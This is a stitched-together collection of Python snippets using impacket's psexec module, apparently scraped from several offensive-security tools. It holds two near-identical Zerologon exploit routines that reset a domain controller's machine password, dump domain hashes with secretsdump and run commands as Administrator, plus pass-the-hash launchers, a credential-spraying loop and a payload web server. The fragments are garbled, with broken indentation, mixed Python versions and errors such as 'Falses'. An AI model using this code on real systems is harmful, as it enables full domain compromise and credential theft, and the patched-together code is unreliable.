def run(cible, logger):
"""
Le run() sera appelé pour chaque demande d'information au sujet d'une
cible. Il recevra en arguments les resultats précédemment agrégés, sous
forme d'un dictionnaire, et contenant notamment l'IP de la cible et son
hostname, et le logger.
La fonction retournera un objet SQLalchemy avec les attributs découverts.
En cas d'exception, la consigner avec le logger approprié et retourner 1
ou laisser remonter l'exception.
"""
resultats = Result()
# Recherche dans la base de SEPM
logger.debug("Lancement de psexec...")
psobject = psexec.PSEXEC("cmd.exe /c systeminfo",
"c:\\windows\\system32\\",
None,
"445/SMB",
username='******',
password='******')
raw_result = psobject.run(cible["ip"])
print raw_result
psobject.kill()
if True:
logger.info(' IP présente dans la base de SEPM')
resultats.presence = True
resultats.os = "OS"
else:
resultats.presence = False
logger.info(' IP inconnue dans SEPM')
return resultats
def ServePsexec(payloaddirectory, targethash, targetusername, targetdomain,
targetipaddr, targetpassword):
try:
command = ''
path = ''
exeFile = payloaddirectory
copyFile = ''
PSEXEC = psexec.PSEXEC(command,
path,
exeFile,
copyFile,
protocols=None,
username=targetusername,
hashes=targethash,
domain=targetdomain,
password=targetpassword,
aesKey=None,
doKerberos=False)
print t.bold_green + '\n [*] Starting Psexec....' + t.normal
time.sleep(20)
PSEXEC.run(targetipaddr)
except Exception as E:
print t.bold_red + '\n[*] Psexec Error!'
print E
print '\n[*] Psexec May Have Worked' + t.normal
def StartPsexec(exeFile, targetusername, psexechash, targetdomain, psexecip):
PSEXEC = psexec.PSEXEC(command="", path="", exeFile=exeFile, copyFile="", protocols=None, username=targetusername,
hashes=psexechash, domain=targetdomain, password='', aesKey=None, doKerberos=False)
print t.bold_green + "\n[*] Starting Psexec...." + t.normal
time.sleep(15)
try:
PSEXEC.run(psexecip)
except SessionError:
print t.bold_red + "[*] Clean Up Failed, Remove Manually with Shell"
def perform_attack(dc_handle, dc_ip, target_computer, target_da="Administrator"):
# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
print('Performing authentication attempts...')
rpc_con = None
for attempt in range(0, MAX_ATTEMPTS):
rpc_con, serverChallenge = try_zero_authenticate(dc_handle, dc_ip, target_computer)
if rpc_con == None:
print('=', end='', flush=True)
else:
break
if rpc_con:
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
plaintext = b'\x00' * 8
sessionKey = nrpc.ComputeSessionKeyStrongKey('', plaintext, serverChallenge, None)
ppp = nrpc.ComputeNetlogonCredential(plaintext, sessionKey)
clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
CLP = nrpc.NL_TRUST_PASSWORD()
CLP['Buffer'] = b'\x00' * 512
CLP['Length'] = '\x00\x00\x00\x00'
blah = nrpc.hNetrServerPasswordSet2(
rpc_con, dc_handle + '\x00',
target_computer + '$\x00', nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00',
update_authenticator(clientStoredCredential, sessionKey, 0), b'\x00' * 516
)
blah.dump()
import secretsdump, psexec
class SDOptions:
def __init__(self):
self.use_vss = False
self.target_ip = dc_ip
self.outputfile = './dumped.tmp'
self.hashes = "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
self.exec_method = "smbexec"
self.just_dc = True
self.just_dc_ntlm = True
self.just_dc_user = target_da
self.pwd_last_set = self.user_status = self.resumefile = \
self.k = self.history = self.ntds = self.sam = self.security = \
self.system = self.aesKey = self.bootkey = None
self.dc_ip = dc_ip
class PSOptions:
def __init__(self):
self.help = False
dump = secretsdump.DumpSecrets(dc_ip, target_computer+'$', '', '', SDOptions()).dump()
f= open("dumped.tmp.ntds").read()
# print(f)
hashes = ':'.join(f.split(':')[2:-3])
print(hashes)
psexec = psexec.PSEXEC('powershell.exe -c Reset-ComputerMachinePassword', None, None, None, hashes=hashes, username=target_da, serviceName='f****d')
psexec.run(dc_name, dc_ip)
else:
print('\nAttack failed. Target is probably patched.')
sys.exit(1)
def process(self, ip):
#Do stuff with the server here
for user, auth in self.credentials:
if self.verbose == 1:
print self.colours.cstring(
"Attempting to auth with " + ip + " using Username: "******" And Auth: " + auth, "light_blue")
if len(auth) == 65 and ':' in auth:
psobject = psexec.PSEXEC(self.com,
self.path,
"445/SMB",
username=user,
hashes=auth)
else:
psobject = psexec.PSEXEC(self.com,
self.path,
"445/SMB",
username=user,
password=auth)
try:
psobject.run(ip)
except:
continue
def perform_attack(options):
# Keep authenticating until succesfull. Expected average number of attempts needed: 256.
print('Performing authentication attempts...')
rpc_con = None
conn = SMBConnection(options.target, options.target, None, options.port)
conn.login('', '')
dc_handle = f"\\\\{conn.getServerName()}"
target_computer = conn.getServerName()
dc_ip = options.target
print(dc_ip)
print(target_computer)
for attempt in range(0, MAX_ATTEMPTS):
rpc_con, serverChallenge = try_zero_authenticate(
dc_handle, dc_ip, target_computer)
if rpc_con == None:
print('=', end='', flush=True)
else:
break
if rpc_con:
print('\nSuccess! DC can be fully compromised by a Zerologon attack.')
plaintext = b'\x00' * 8
sessionKey = nrpc.ComputeSessionKeyStrongKey('', plaintext,
serverChallenge, None)
ppp = nrpc.ComputeNetlogonCredential(plaintext, sessionKey)
clientStoredCredential = pack('<Q', unpack('<Q', ppp)[0] + 10)
print()
blah = nrpc.hNetrServerPasswordSet2(
rpc_con, dc_handle + '\x00', target_computer + '$\x00',
nrpc.NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
target_computer + '\x00',
update_authenticator(clientStoredCredential, sessionKey,
0), b'\x00' * 516)
blah.dump()
# stringbinding = epm.hept_map(options.target, lsat.MSRPC_UUID_LSAT, protocol="ncacn_ip_tcp")
# rpc_con = transport.DCERPCTransportFactory(stringbinding).get_dce_rpc()
# rpc_con.connect()
# rpc_con.bind(lsat.MSRPC_UUID_LSAT)
# resp = lsad.hLsarOpenPolicy2(rpc_con, MAXIMUM_ALLOWED | lsat.POLICY_LOOKUP_NAMES)
# sid = lsad.hLsarQueryInformationPolicy2(rpc_con, resp['PolicyHandle'], lsad.POLICY_INFORMATION_CLASS.PolicyAccountDomainInformation)['PolicyInformation']['PolicyPrimaryDomainInfo']['Sid'].formatCanonical()
# print(sid)
if options.silver:
exit()
import secretsdump, psexec
class SDOptions:
def __init__(self):
self.use_vss = False
self.target_ip = dc_ip
self.outputfile = './dumped.tmp'
self.hashes = "aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0"
self.exec_method = "smbexec"
self.just_dc = True
self.just_dc_ntlm = True
self.just_dc_user = options.target_da
self.pwd_last_set = self.user_status = self.resumefile = \
self.k = self.history = self.ntds = self.sam = self.security = \
self.system = self.aesKey = self.bootkey = None
self.dc_ip = dc_ip
class PSOptions:
def __init__(self):
self.help = Falses
# h = SMBConnection(options.target, options.target, None, options.port)
# if options.target_machine:
# h.login(options.target_machine + "$", '')
# else:
# h.login(target_computer + '$', '')
secretsdump.DumpSecrets(dc_ip, target_computer + '$', '', '',
SDOptions()).dump()
f = open("dumped.tmp.ntds").read()
# print(f)
hashes = ':'.join(f.split(':')[2:-3])
print(hashes)
psexec = psexec.PSEXEC(
'powershell.exe -c Reset-ComputerMachinePassword',
None,
None,
None,
hashes=hashes,
username=options.target_da,
serviceName='f****d')
psexec.run(options.target, dc_ip)
else:
print('\nAttack failed. Target is probably patched.')
sys.exit(1)
print("[*] Starting web server on port %s in %s") % (
str(src_port), str(cwd))
if hash:
print(
"[*] Attempting to access the system %s with, user: %s hash: %s domain: %s "
) % (dst, usr, hash, dom)
else:
print(
"[*] Attempting to access the system %s with, user: %s pwd: %s domain: %s "
) % (dst, usr, pwd, dom)
attack = psexec.PSEXEC(command,
path=directory,
protocols=protocol,
username=usr,
password=pwd,
domain=dom,
hashes=hash,
copyFile=None,
exeFile=None,
aesKey=aes,
doKerberos=kerberos)
attack.run(dst)
if attacks:
srv.terminate()
print("[*] Shutting down the catapult web server")
elif wmiexec_cmd:
for dst in final_targets:
if attacks:
srv = http_server(src_port, cwd)
print("[*] Starting web server on port %s in %s") % (
str(src_port), str(cwd))
# this script should be used with impacket # python psexec.py admin:[email protected] cmd -path c:\\windows\\system32\\ import psexec ip = "10.10.10.10" username = "******" #password="" hashes = "adasdasdasdasd:dahjkdhasksjhdsa" #pass the hash technique psobject = psexec.PSEXEC("cmd.exe", "c:\\windows\\system32\\", "445/SMB", username=username, hashes=hashes) #psobject = psexec.PSEXEC("cmd.exe", "c:\\windows\\system32\\", "445/SMB", username=username, password=password) psobject.run(ip)